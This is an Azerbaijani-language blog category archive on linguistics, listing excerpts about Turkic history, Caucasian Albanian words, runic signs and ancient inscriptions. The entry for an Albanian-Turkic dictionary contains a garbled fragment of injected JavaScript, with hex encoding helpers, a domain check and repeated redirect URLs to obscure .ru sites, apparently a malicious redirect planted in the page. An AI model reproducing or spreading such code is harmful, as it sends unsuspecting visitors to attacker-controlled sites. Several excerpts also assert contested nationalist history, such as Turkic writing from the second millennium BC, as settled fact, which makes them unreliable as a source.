Kateqoriya Arxivləri: Dilçilik

TÜRKÜN GİZLİ TARİXİ

Yunus Oğuz Bəxtiyar Tuncay TÜRKÜN GİZLİ TARİX

Dilçilik, Folklor, Mifologiya, Tarix, Türkçülük Kateqoriya: | Bir şərh yazın

ALBAN DİLİNDƏ İŞLƏNMİŞ BƏZİ ZOONİMLƏR BARƏDƏ

Züleyxa Şahverdizadə Azərbaycan Dillər Unuversiteti, IV kurs tələbəsi Azərbaycanşünaslığın qarşısında duran ən aktual problemlərindən biri də tariximiz və mədəniyyətimizlə bağlı elmə məlum olmayan və ya az məlum olan maddi və mənəvi mədəniyyət nümunələrinin, o cümlədən ədəbi əsərlərin aşkarlanması və təbliğ … Oxumağa davam et

Dilçilik Kateqoriya: | Bir şərh yazın

Yazılı daşın açılmamış sirrləri

Bəxtiyar Tuncay Yazılı daşın açılmamış sirrləri

Dilçilik, Folklor, Qafqaz Albaniyası, Tarix Kateqoriya: | Bir şərh yazın

ALBAN (QAFQAZ) TÜRKCƏSİ SÖZLÜYÜ I CİLD (A-X)

Bəxtiyar Tuncay ALBAN (QAFQAZ) TÜRKCƏSİ SÖZLÜYÜ I CİLD (A-X) // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “bextiyartuncay.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482 https://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482 https://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482 https://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

Dilçilik, Qafqaz Albaniyası Kateqoriya: | Bir şərh yazın

DӘDӘ QORQUDDAKI AT RӘNGLӘRİNİN TÜRK DÖVLӘT GӘLӘNӘYİ VӘ YÖNLӘRLӘ BAĞLILIĞI

Dr. Seyfәddin ALTAYLI Türklәr, tarixin әn qәdim çağlarından bәri yaşadıqları coğrafiyada hәm Türk tarixihnә, hәm dә dünya tarixinә önәmli bәhrәlәr qazandırıb. Türk dövlәtçiliyinin bilinәn tarixi Aratta dövlәti ilә başlayır. Ulu babalarımız tarixin yaranmasından әtibarәn Azәrbaycanda vә Anadoluda mәskunlaşsalar da, müәyyәn … Oxumağa davam et

Dilçilik, Folklor, Mifologiya Kateqoriya: | Bir şərh yazın

ARAN NƏSLİNDƏN SAKAR HÖKMDARI AZOYA AİD SİKKƏLƏR ÜZƏRİNDƏKİ TÜRKCƏ YAZILAR BARƏDƏ BİR NEÇƏ SÖZ

Hazırda dünyanın qədim epiqrafika və numizmatika nümunələrinin toplandığı bir çox nüfuzlu albom və kataloqlarda Əhəmənilər dövrünə aid edilən, fars mədəni abidələri kimi qələmə verilən, üzərlərində fonetik yazı nümunələrinə rast gəlinən çox sayda dairəvi möhür, gilbasma və sikkəyə rast gəlmək olur … Oxumağa davam et

Çeşitli, Dilçilik, Tarix, Türkçülük Kateqoriya: | Bir şərh yazın

ANA damğasının izi ilə!

Yengi Ögə aNa damğası Əski türk damğalı yazı sistemində yer alan bəzi həndəsi formalı işarələr nədənsə çox zaman unudularaq, türk əlifbasının hərfləri sırasında göstərilmir.Onlardan biri də “n” və “nq” səslərini ifadə edən romb formalı işarədir. Türk yazı mədəniyyətinin piktroqrafiyadan ideoqrafiyaya, … Oxumağa davam et

Dilçilik, Mifologiya, Tarix, Türkçülük Kateqoriya: | 1 şərh

“OĞUZNAMƏ” NİN DİLİ

“OĞUZNAMƏ” NİN DİLİ

Dilçilik, Folklor, Türkçülük Kateqoriya: | Bir şərh yazın

“BAYAT” DAMĞASI, TİMƏRƏ TƏSVİRİ VƏ QAZAX FOLKLORU

B. Tuncay, Yengi Ögə Dilçi alim Firidun Ağasıoğlu özünün “Azər xalqı” kitabında haqlı olaraq bildirir ki, “Runik yazının mənşəyi haqqında söylənmiş fikirlər üç qrupa ayrılır: Birinci qrup türk runik yazının miladdan sonra lV – Vl əsrlərdə doğuya gətirilmiş aramey, (arami) parth, … Oxumağa davam et

Dilçilik, Mifologiya, Tarix, Türkçülük Kateqoriya: | Bir şərh yazın

E.Ə II MİNİLLİYƏ AİD TÜRKCƏ YAZI NÜMUNƏSİ

  B.Tuncay Son dövrlərdə Azərbaycandan tapılan çoxsaylı yazı nümunələrinin  təhlil və oxunuşu ölkəmizin yerləşdiyi bölgənin, elm aləmində ilk dəfə tapıldığı yerin adı ilə “Orxon-Yenisey” yazıları adlandırılan qədim türk yazı sisteminin formalaşaraq, bütün Avrasiya məkanına yayıldığı ilkin ərazi olduğunu söyləməyə əsas verir. … Oxumağa davam et

Dilçilik, Tarix, Türkçülük Kateqoriya: | Bir şərh yazın